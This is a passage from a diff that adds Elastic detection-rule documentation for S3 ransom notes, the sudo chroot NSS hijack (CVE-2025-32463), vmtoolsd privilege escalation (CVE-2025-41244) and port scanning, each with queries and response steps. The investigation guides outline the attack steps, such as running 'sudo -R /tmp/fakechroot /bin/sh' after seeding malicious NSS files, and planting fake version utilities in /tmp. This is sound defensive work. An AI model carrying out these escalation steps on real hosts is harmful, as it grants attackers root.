Object Lock legal hold to clean versions during recovery if configured. +- If Versioning is not enabled, recover from backups (AWS Backup, replication targets). Enable Versioning going forward on critical buckets; evaluate Object Lock for high-value data. +- Carefully remove any temporary deny policy only after credentials are rotated, policies re-validated, and no ongoing destructive activity is observed. + +**6. Post-incident hardening** +- Enforce `Block Public Access`, enable Versioning (and MFA-Delete where appropriate), and review bucket policies for least privilege. +- Ensure continuous CloudTrail data events for S3 are enabled in covered regions; enable/verify GuardDuty S3 protections and alerts routing. +- Add detections for related behaviors (policy tampering, bulk deletes, versioning/lifecycle toggles) and create allowlists for known maintenance windows. + +**7. Communication & escalation** +- If you have an IR team/provider: escalate with the evidence bundle and a summary (bucket/key, actor, protections, related activity, business impact). +- If you do not have an IR team: designate an internal incident lead, track actions/time, and follow these steps conservatively. Favor reversible controls (temporary deny, key rotation) over invasive changes. + + +*Additional Information:* + +- For further guidance on managing S3 bucket security and protecting against ransomware, refer to the https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html[AWS S3 documentation] and AWS best practices for security. +- https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/IRP-Ransomware.md[AWS IRP—Ransomware] (NIST-aligned template for evidence, containment, eradication, recovery, post-incident). +- https://github.com/aws-samples/aws-customer-playbook-framework/blob/a8c7b313636b406a375952ac00b2d68e89a991f2/docs/Ransom_Response_S3.md[AWS Customer Playbook—Ransom Response (S3)] (bucket-level response steps: public access blocks, temporary deny, versioning/object lock, lifecycle considerations, recovery). + + +==== Setup + + +AWS S3 data types need to be enabled in the CloudTrail trail configuration to capture PutObject API calls. + +==== Rule query + + +[source, js] +---------------------------------- +file where + event.dataset == "aws.cloudtrail" and + event.provider == "s3.amazonaws.com" and + event.action == "PutObject" and + event.outcome == "success" and + /* Apply regex to match patterns only after the bucket name */ + aws.cloudtrail.resources.arn regex "arn:aws:s3:::[^/]+/.*?(ransom|lock|crypt|enc|readme|how_to_decrypt|decrypt_instructions|recovery|datarescue).*" and + not aws.cloudtrail.resources.arn regex ".*(AWSLogs|CloudTrail|access-logs).*" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ +* Technique: +** Name: Data Encrypted for Impact +** ID: T1486 +** Reference URL: https://attack.mitre.org/techniques/T1486/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-cve-2025-32463-nsswitch-file-creation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-cve-2025-32463-nsswitch-file-creation.asciidoc new file mode 100644 index 0000000000..6f28e6d984 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-cve-2025-32463-nsswitch-file-creation.asciidoc @@ -0,0 +1,159 @@ +[[prebuilt-rule-8-19-8-potential-cve-2025-32463-nsswitch-file-creation]] +=== Potential CVE-2025-32463 Nsswitch File Creation + +Detects suspicious creation of the nsswitch.conf file, outside of the regular /etc/nsswitch.conf path, consistent with attempts to exploit CVE-2025-32463 (the "sudo chroot" privilege escalation), where an attacker tricks sudo into using attacker-controlled NSS files or libraries to gain root. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file* +* logs-sentinel_one_cloud_funnel.* +* endgame-* +* auditbeat-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot +* https://github.com/kh4sh3i/CVE-2025-32463 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend +* Data Source: SentinelOne +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Auditd Manager +* Use Case: Vulnerability +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential CVE-2025-32463 Nsswitch File Creation* + + +This rule flags creation of an nsswitch.conf file outside the standard /etc location by a shell, an early sign of staging a fake root to coerce sudo's chroot path and hijack NSS resolution (CVE-2025-32463). A common pattern is writing /tmp/chroot/etc/nsswitch.conf, placing or pointing to a malicious NSS module, then running sudo chroot into that directory so name lookups load attacker-controlled code and escalate to root. + + +*Possible investigation steps* + + +- Correlate the event with any sudo or chroot executions within ±10 minutes that reference the same directory prefix (e.g., /tmp/chroot), capturing full command line, user, TTY, working directory, and exit codes. +- Inspect the created nsswitch.conf for nonstandard services or module names and enumerate any libnss_*.so* under lib*/ or usr/lib*/ within that prefix, recording owner, hashes, and timestamps. +- List all contemporaneous file writes under the same prefix (etc, lib*, bin, sbin) to determine whether a chroot rootfs is being assembled and attribute it to a toolchain such as tar, rsync, debootstrap, or custom scripts via process ancestry. +- Search file access telemetry to see whether privileged processes subsequently read that specific nsswitch.conf or loaded libnss_* from the same path, which would indicate the chroot was exercised. +- Verify sudo and glibc versions and patch status for CVE-2025-32463 and collect the initiating user’s session context (SSH source, TTY, shell history) to assess exploitability and scope. + + +*False positive analysis* + + +- An administrator legitimately staging a temporary chroot or test root filesystem may use a shell to create /tmp/*/etc/nsswitch.conf while populating configs, matching the rule even though no privilege escalation is intended. +- OS installation, recovery, or backup-restore workflows run from a shell can populate a mounted target like /mnt/newroot/etc/nsswitch.conf, creating the file outside /etc as part of maintenance and triggering the alert. + + +*Response and remediation* + + +- Terminate any sudo or chroot processes referencing the created path (e.g., /tmp/chroot/etc/nsswitch.conf), lock the initiating user’s sudo access, and quarantine the parent directory with root-only permissions. +- Remove the staged nsswitch.conf and any libnss_*.so* or ld.so.* artifacts under lib*/ or usr/lib*/ within that prefix after collecting copies, hashes, and timestamps for evidence. +- Restore and verify /etc/nsswitch.conf on the host with correct content and root:root 0644, purge temporary chroot roots under /tmp, /var/tmp, or /mnt, and restart nscd or systemd-resolved to flush cached name-service data. +- Escalate to incident response if sudo chroot was executed against the same directory, if root processes loaded libnss_* from that path, or if nsswitch.conf appears outside /etc on multiple hosts within a short window. +- Apply vendor fixes for CVE-2025-32463 to sudo and glibc, disallow chroot in sudoers and enforce env_reset, noexec, and secure_path, and mount /tmp and /var/tmp with noexec,nosuid,nodev to prevent libraries being sourced from user-writable paths. +- Add controls to block execution from user-created chroot trees by policy (AppArmor or SELinux) and create alerts on creation of */etc/nsswitch.conf or libnss_* writes under non-system paths, with auto-isolation for directories under /tmp or a user’s home. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type == "creation" and file.path like "/*/etc/nsswitch.conf" and +process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and +not ( + process.name == "dash" and file.path like ("/var/tmp/mkinitramfs_*", "/tmp/tmp.*/mkinitramfs_*") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-cve-2025-32463-sudo-chroot-execution-attempt.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-cve-2025-32463-sudo-chroot-execution-attempt.asciidoc new file mode 100644 index 0000000000..c7ecaf2c2a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-cve-2025-32463-sudo-chroot-execution-attempt.asciidoc @@ -0,0 +1,159 @@ +[[prebuilt-rule-8-19-8-potential-cve-2025-32463-sudo-chroot-execution-attempt]] +=== Potential CVE-2025-32463 Sudo Chroot Execution Attempt + +Detects suspicious use of sudo's --chroot / -R option consistent with attempts to exploit CVE-2025-32463 (the "sudo chroot" privilege escalation), where an attacker tricks sudo into using attacker-controlled NSS files or libraries to gain root. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* +* endgame-* +* auditbeat-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot +* https://github.com/kh4sh3i/CVE-2025-32463 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend +* Data Source: SentinelOne +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Auditd Manager +* Use Case: Vulnerability +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential CVE-2025-32463 Sudo Chroot Execution Attempt* + + +This rule highlights sudo invoked with the chroot (-R/--chroot) option outside normal administration, a behavior tied to CVE-2025-32463 where attackers force sudo to load attacker-controlled NSS configs or libraries and escalate to root. An attacker pattern: running sudo -R /tmp/fakechroot /bin/sh after seeding that directory with malicious nsswitch.conf and libnss to obtain a root shell. Treat unexpected chrooted sudo on Linux hosts as high-risk privilege escalation activity. + + +*Possible investigation steps* + + +- Extract the chroot target path from the event and enumerate its etc and lib directories for attacker-seeded NSS artifacts (nsswitch.conf, libnss_*, ld.so.preload) and fake passwd/group files, noting recent mtime, ownership, and world-writable files. +- Pivot to file-creation and modification telemetry to identify processes and users that populated that path shortly before execution (e.g., curl, wget, tar, git, gcc), linking them to the invoking user to establish intent. +- Review session and process details to see if a shell or interpreter was launched inside the chroot and whether an euid transition to 0 occurred, indicating a successful privilege escalation. +- Confirm sudo’s package version and build options and the user’s sudoers policy (secure_path/env_* settings and any NOPASSWD allowances) to assess exploitability and whether chroot usage was authorized. +- Collect and preserve the chroot directory contents and relevant audit/log artifacts, and scope by searching for similar chroot invocations or NSS file seeds across the host and fleet. + + +*False positive analysis* + + +- A legitimate offline maintenance session where an administrator chroots into a mounted system under /mnt or /srv using sudo --chroot to run package or initramfs commands, which will trigger when the invoked program is not in the whitelist. +- An image-building or OS bootstrap workflow that stages a root filesystem and uses sudo -R to execute a shell or build/configuration scripts inside the chroot, producing the same pattern from a known user or host context. + + +*Response and remediation* + + +- Immediately isolate the affected host from the network, revoke the invoking user’s sudo privileges, and terminate any chrooted shells or child processes spawned via “sudo -R /bin/sh” or similar executions. +- Preserve evidence and then remove attacker-seeded NSS and loader artifacts within the chroot path—delete or replace nsswitch.conf, libnss_*.so, ld.so.preload, passwd, and group files, and clean up world-writable staging directories like /tmp/fakechroot. +- Upgrade sudo to a fixed build that addresses CVE-2025-32463, and recover by restoring any modified system NSS and loader files from known-good backups while validating ownership, permissions, and hashes. +- Escalate to full incident response if a root shell or process with euid 0 is observed, if /etc/ld.so.preload or /lib/libnss_*.so outside the chroot show unauthorized changes, or if similar “sudo -R” executions appear across multiple hosts. +- Harden by updating sudoers to remove NOPASSWD for chrooted commands, enforce Defaults env_reset and secure_path with noexec, disable “--chroot” usage for non-admin workflows, and monitor for creation of libnss_*.so or nsswitch.conf in non-standard directories. +- Add platform controls by enabling SELinux/AppArmor policies on sudo and the dynamic loader, applying nodev,nosuid,noexec mounts to /tmp and build paths, and setting immutability (chattr +i) on /etc/nsswitch.conf where operationally feasible. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "executed", "process_started", "ProcessRollup2") and +process.name == "sudo" and process.args in ("-R", "--chroot") and +// To enforce the -R and --chroot arguments to be for sudo specifically, while wildcarding potential full sudo paths +process.command_line like ("*sudo -R*", "*sudo --chroot*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt.asciidoc new file mode 100644 index 0000000000..d40f8ece52 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt.asciidoc @@ -0,0 +1,164 @@ +[[prebuilt-rule-8-19-8-potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt]] +=== Potential CVE-2025-41244 vmtoolsd LPE Exploitation Attempt + +This rule looks for processes that behave like an attacker trying to exploit a known vulnerability in VMware tools (CVE-2025-41244). The vulnerable behavior involves the VMware tools service or its discovery scripts executing other programs to probe their version strings. An attacker can place a malicious program in a writable location (for example /tmp) and have the tools execute it with elevated privileges, resulting in local privilege escalation. The rule flags launches where vmtoolsd or the service discovery scripts start other child processes. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* +* endgame-* +* auditbeat-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend +* Data Source: SentinelOne +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Auditd Manager +* Use Case: Vulnerability +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential CVE-2025-41244 vmtoolsd LPE Exploitation Attempt* + + +This rule flags child processes started by vmtoolsd or its version-checking script on Linux, behavior central to CVE-2025-41244 where the service executes external utilities to read version strings. It matters because a local user can coerce these invocations to run arbitrary code with elevated privileges. A typical pattern is dropping a counterfeit lsb_release or rpm in /tmp, modifying PATH, and triggering vmtoolsd/get-versions.sh so the rogue binary executes and spawns a privileged shell or installer. + + +*Possible investigation steps* + + +- Examine the executed child binary’s full path and location, flagging any binaries in writable directories (e.g., /tmp, /var/tmp, /dev/shm, or user home) or masquerading as version utilities (lsb_release, rpm, dpkg, dnf, pacman), and record owner, size, hash, and recent timestamps. +- Pull the parent’s and child’s command-line and environment to confirm PATH ordering and whether writable paths precede system binaries, capturing any evidence that get-versions.sh or vmtoolsd invoked a non-standard utility. +- Pivot to subsequent activity from the child process to see if it spawns an interactive shell, escalates EUID to root, touches /etc/sudoers or /etc/passwd, writes to privileged directories, or opens outbound connections. +- Verify integrity of open-vm-tools components by comparing hashes and file sizes of vmtoolsd and serviceDiscovery scripts with vendor packages (rpm -V or dpkg --verify) and checking for unexpected edits, symlinks, or PATH-hijackable calls within the scripts. +- Correlate filesystem creation events and terminal histories to identify the user who dropped or modified the suspicious binary and whether it appeared shortly before the alert, then assess other hosts for the same filename or hash to determine spread. + + +*False positive analysis* + + +- Routine vmtoolsd service discovery via get-versions.sh during VM boot or periodic guest info refresh can legitimately spawn version/package utilities from standard system paths with a default PATH and no execution from writable directories, yet still match this rule. +- Administrator troubleshooting or post-update validation of open-vm-tools—manually running get-versions.sh or restarting vmtoolsd—can cause a shell to launch the script and start expected system utilities in trusted locations, producing a benign alert. + + +*Response and remediation* + + +- Isolate the affected VM, stop the vmtoolsd service, terminate its spawned children (e.g., lsb_release, rpm, dpkg, or /bin/sh launched via open-vm-tools/serviceDiscovery/scripts/get-versions.sh), and temporarily remove execute permissions from the serviceDiscovery scripts to halt exploitation. +- Quarantine and remove any counterfeit or hijacked utilities and symlinks in writable locations (/tmp, /var/tmp, /dev/shm, or user home) that were executed by vmtoolsd/get-versions.sh, capturing full paths, hashes, owners, and timestamps for evidence. +- Recover by reinstalling open-vm-tools from a trusted repository and verifying integrity of vmtoolsd and serviceDiscovery scripts (rpm -V or dpkg --verify), then restart vmtoolsd only after confirming PATH does not include writable directories and that the scripts call absolute binaries under /usr/bin. +- Escalate to full incident response if a vmtoolsd child executed from a writable path ran with EUID 0, spawned an interactive shell (/bin/sh or /bin/bash), or modified /etc/sudoers or /etc/passwd, and initiate credential rotation and a host-wide compromise assessment. +- Harden hosts by enforcing a safe PATH (e.g., /usr/sbin:/usr/bin:/sbin:/bin), removing writable directories from system and user environment files, mounting /tmp,/var/tmp,/dev/shm with noexec,nosuid,nodev, and applying AppArmor/SELinux policies to block vmtoolsd from executing binaries outside system directories. +- Prevent recurrence by deploying the vendor fix for CVE-2025-41244 across all Linux VMs, pinning or replacing the open-vm-tools serviceDiscovery scripts with versions that use absolute paths, and adding EDR allowlists/blocks so vmtoolsd cannot launch binaries from writable paths. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "executed", "process_started", "ProcessRollup2") and +( + ( + process.parent.name == "vmtoolsd" + ) or + ( + process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and + ?process.parent.args like ("/*/open-vm-tools/serviceDiscovery/scripts/get-versions.sh") + ) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-port-scanning-activity-from-compromised-host.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-port-scanning-activity-from-compromised-host.asciidoc new file mode 100644 index 0000000000..7da7163541 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-port-scanning-activity-from-compromised-host.asciidoc @@ -0,0 +1,188 @@ +[[prebuilt-rule-8-19-8-potential-port-scanning-activity-from-compromised-host]] +=== Potential Port Scanning Activity from Compromised Host + +This rule detects potential port scanning activity from a compromised host. Port scanning is a common reconnaissance technique used by attackers to identify open ports and services on a target system. A compromised host may exhibit port scanning behavior when an attacker is attempting to map out the network topology, identify vulnerable services, or prepare for further exploitation. This rule identifies potential port scanning activity by monitoring network connection attempts from a single host to a large number of ports within a short time frame. ESQL rules have limited fields available in its alert documents. Make sure to review the original documents to aid in the investigation of this alert. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 1h + +*Searches indices from*: now-61m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 7 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential Port Scanning Activity from Compromised Host* + + +Port scanning is a reconnaissance method used by attackers to identify open ports and services on a network, often as a precursor to exploitation. In Linux environments, compromised hosts may perform rapid connection attempts to numerous ports, signaling potential scanning activity. The detection rule identifies such behavior by analyzing network logs for a high number of distinct port connections from a single host within a short timeframe, indicating possible malicious intent. + + +*Possible investigation steps* + + +- Review the network logs to identify the specific host exhibiting the port scanning behavior by examining the destination.ip and process.executable fields. +- Analyze the @timestamp field to determine the exact time frame of the scanning activity and correlate it with any other suspicious activities or alerts from the same host. +- Investigate the process.executable field to understand which application or service initiated the connection attempts, and verify if it is a legitimate process or potentially malicious. +- Check the destination.port field to identify the range and types of ports targeted by the scanning activity, which may provide insights into the attacker's objectives or the services they are interested in. +- Assess the host's security posture by reviewing recent changes, installed software, and user activity to determine if the host has been compromised or if the scanning is part of legitimate network operations. +- Consult the original documents and logs for additional context and details that may not be captured in the alert to aid in a comprehensive investigation. + + +*False positive analysis* + + +- Legitimate network scanning tools used by system administrators for network maintenance or security assessments can trigger this rule. To handle this, identify and whitelist the IP addresses or processes associated with these tools. +- Automated vulnerability scanners or monitoring systems that perform regular checks on network services may cause false positives. Exclude these systems by creating exceptions for their known IP addresses or process names. +- High-volume legitimate services that open multiple connections to different ports, such as load balancers or proxy servers, might be flagged. Review and exclude these services by specifying their IP addresses or process executables. +- Development or testing environments where frequent port scanning is part of routine operations can be mistakenly identified. Implement exceptions for these environments by excluding their specific network segments or host identifiers. +- Scheduled network discovery tasks that are part of IT operations can mimic port scanning behavior. Document and exclude these tasks by setting up time-based exceptions or identifying their unique process signatures. + + +*Response and remediation* + + +- Isolate the compromised host from the network immediately to prevent further scanning and potential lateral movement. +- Terminate any suspicious processes identified by the process.executable field to halt ongoing malicious activities. +- Conduct a thorough review of the compromised host's system logs and network traffic to identify any unauthorized access or data exfiltration attempts. +- Patch and update all software and services on the compromised host to close any vulnerabilities that may have been exploited. +- Change all credentials associated with the compromised host and any potentially affected systems to prevent unauthorized access. +- Monitor the network for any further signs of scanning activity or other suspicious behavior from other hosts, indicating potential additional compromises. +- Escalate the incident to the security operations team for further investigation and to determine if additional systems are affected. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-endpoint.events.network-* +| where + @timestamp > now() - 1h and + host.os.type == "linux" and + event.type == "start" and + event.action == "connection_attempted" and + network.direction == "egress" and + destination.port < 32768 and + not ( + cidr_match(destination.ip, "127.0.0.0/8", "::1", "FE80::/10", "FF00::/8") or + process.executable in ( + "/opt/dbtk/bin/jsvc", "/usr/lib/dotnet/dotnet", "/usr/share/elasticsearch/jdk/bin/java", "/usr/sbin/haproxy", + "/usr/bin/java", "/opt/kaspersky/kesl/libexec/kesl", "/usr/bin/dotnet", "/opt/java/openjdk/bin/java" + ) or + process.executable like "/var/opt/kaspersky/kesl/*kesl" or + process.executable like "/usr/lib/jvm/*/java" or + process.executable like "/opt/google/chrome*" or + process.executable like "/var/lib/docker/*/java" or + process.executable like "/usr/lib64/jvm/*/java" or + process.executable like "/snap/*" 